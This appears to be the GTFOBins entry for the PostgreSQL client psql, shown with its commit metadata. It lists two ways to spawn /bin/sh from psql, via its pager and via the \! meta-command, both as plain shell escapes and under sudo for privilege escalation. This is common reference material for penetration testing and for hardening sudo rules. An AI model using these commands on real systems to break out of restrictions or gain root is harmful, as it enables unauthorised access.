GTFOBins.github.io/_gtfobins/psql.md
funkyremi 8a66a4c0db
Update psql.md
Update psql.md
The previous option was not working for me and the new one is working
2024-05-23 14:34:40 +02:00

21 lines
359 B
Markdown

---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions:
shell:
- code: |
psql
\?
!/bin/sh
- code: |
psql
\! /bin/sh
sudo:
- code: |
psql
\?
!/bin/sh
- code: |
psql
\! /bin/sh
---